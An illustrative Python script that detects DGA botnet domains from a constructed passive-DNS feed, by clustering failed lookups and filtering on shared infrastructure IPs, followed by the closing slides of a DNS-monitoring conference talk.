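The simplified algorithm from the "Detecting DGA" slide and the clustering characteristics from the sample analysis, run end to end over a constructed passive-DNS feed. This is an added example, not the dnslyzer code linked at the end of the deck: failed lookups are selected by RCODE (note that RFC 1035 assigns 2 to SERVFAIL and 3 to NXDOMAIN, the reverse of the labels on the slide), grouped by f(zone, length, depth), kept when their queries are spread evenly across time buckets (this example's reading of "even distribution"), extended to the resolving members of the same cluster, reduced to the IPs several members share (the common-denominator filter that drops an avatarmaker.eu-style false positive), and finally turned around as the IP-to-domain transform over the whole feed. The bigram randomness score, the cluster-key format, the feed format and the infrastructure IPs (RFC 5737 documentation ranges) are all constructed.

```python
# Added example (not the dnslyzer code): the simplified DGA algorithm from the
# "Detecting DGA" slide over a constructed passive-DNS feed, with the cluster
# key, n-gram check and IP common-denominator filter from the sample analysis.
# RFC 1035 RCODEs: 0 NOERROR, 2 SERVFAIL, 3 NXDOMAIN.
from collections import Counter, defaultdict
from datetime import datetime

# Constructed feed, one record per line: "<timestamp> <qname> <rcode> <answer|->".
# Infrastructure IPs are documentation addresses (RFC 5737).
CONSTRUCTED_PDNS = """\
2012-05-03T10:00:02 qpwlvxmtc.eu 3 -
2012-05-03T10:00:04 bookst" + "ore.eu 0 198.51.100.20
2012-05-03T10:01:05 hgtrbnvlp.eu 3 -
2012-05-03T10:01:09 www.example.eu 0 198.51.100.7
2012-05-03T10:02:11 kdjswqeru.eu 3 -
2012-05-03T10:02:40 typo-of-site.eu 3 -
2012-05-03T10:03:14 vxsqtrhfd.eu 2 -
2012-05-03T10:03:20 mail.example.eu 3 -
2012-05-03T10:04:17 plmkoijnb.eu 3 -
2012-05-03T10:04:25 zcxrwuj4b.eu 0 203.0.113.37
2012-05-03T10:05:30 xtrqwnlkh.eu 0 203.0.113.37
2012-05-03T10:05:33 oldshopname.eu 3 -
2012-05-03T10:06:00 update.hacked-site.example 0 203.0.113.37
""".replace('" + "', "")
FAILED_RCODES = {2, 3}
COMMON_BIGRAMS = set(("th he in er an re on at en nd ti es or te of ed is it al ar st to nt ng se "
                      "ha as ou io le ve co me de hi ri ro ic ne ea ra ce li ch ll be ma si om ur "
                      "ca el ta la ns di fo ho pe ec pr no ct us ac ot il tr ly nc et ut ss").split())


def parse_feed(text):
    records = []
    for line in text.strip().splitlines():
        ts, qname, rcode, answer = line.split()
        records.append({"ts": datetime.fromisoformat(ts), "qname": qname.lower().rstrip("."),
                        "rcode": int(rcode), "answer": None if answer == "-" else answer})
    return records


def cluster_key(qname):
    """f(zone, length, depth): zone = last label (no public suffix list here),
    length of the left-most label, number of labels. Format is this example's own."""
    labels = qname.split(".")
    return f"{labels[-1]}_{len(labels[0])}_{len(labels)}"


def randomness(label):
    """Share of bigrams that are not common English bigrams: natural words score
    low, generated strings (and anything with digits) score near 1.0."""
    bigrams = [label[i:i + 2] for i in range(len(label) - 1)]
    if not bigrams:
        return 0.0
    return sum(bg not in COMMON_BIGRAMS for bg in bigrams) / len(bigrams)


def temporal_spread(timestamps, bucket_seconds=60):
    """Fraction of time buckets between first and last query that are occupied:
    a bot polling its schedule fills most of them, a one-off burst fills one."""
    t0 = min(timestamps)
    buckets = {int((t - t0).total_seconds()) // bucket_seconds for t in timestamps}
    return len(buckets) / (max(buckets) + 1)


def hunt(records, min_failed=3, min_spread=0.6, min_shared=2):
    """One pass of the slide's loop: failed lookups -> clusters -> members -> IPs -> more domains."""
    groups = defaultdict(list)
    for r in records:
        if r["rcode"] in FAILED_RCODES:           # step 1: failed lookups only
            groups[cluster_key(r["qname"])].append(r)
    report = {}
    for key, failed in groups.items():
        if len(failed) < min_failed:
            continue
        if temporal_spread([r["ts"] for r in failed]) < min_spread:   # step 2: even distribution
            continue
        members = [r for r in records if cluster_key(r["qname"]) == key]  # step 3: same f(x)
        ip_hits = Counter(r["answer"] for r in members if r["answer"])
        infra_ips = sorted(ip for ip, n in ip_hits.items() if n >= min_shared)  # step 4: shared IPs
        were_active = sorted({r["qname"] for r in members if r["answer"] in infra_ips})
        report[key] = {
            "could_be_active": sorted({r["qname"] for r in failed}),
            "were_active": were_active,
            "infra_ips": infra_ips,
            # members that resolved to an unshared IP: review before blocking
            "suspected_false_positives": sorted({r["qname"] for r in members
                                                 if r["answer"] and r["answer"] not in infra_ips}),
            # step 5: IP -> domain transform over the whole feed
            "related_via_ip": sorted({r["qname"] for r in records
                                      if r["answer"] in infra_ips} - set(were_active)),
            "randomness": {r["qname"]: round(randomness(r["qname"].split(".")[0]), 2)
                           for r in members},
        }
    return report


if __name__ == "__main__":
    for key, c in hunt(parse_feed(CONSTRUCTED_PDNS)).items():
        print(key, c["infra_ips"], c["were_active"], c["related_via_ip"])
```

The thresholds (three failures, 60 % of minute buckets occupied, an IP shared by two members) are tuned to the toy feed; on a real sensor at the 30-50 requests per minute per domain quoted later in the deck they would be set much higher, and the WHOIS and AS-reputation characteristics the slide lists would join the IP filter as further common denominators.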

77

Automation

78

Performance

● On a single machine (32Gb RAM) we run up to 2000 pkt/sec without significant performance loss

● Average load:

79

Other Interesting numbers

● Packets per day: ~130M filtered.

● Mal. domains/day: ~30k DNS queries (varies)

● Avg. 30-50 req/minute for single domain

80

Uses of the data

● Obvious: blacklists

● Botnet takeovers (costs 11 USD or less ;)

● Sinkholing

81

Demotime :)

● (demos, lets look at some videos :)

82

Questions?

@fygrave @vbkropotov

83

Feedback: @fygrave, @vbkropotov (also @ gmail.com)

Code:

https://github.com/fygrave/dnslyzer.git
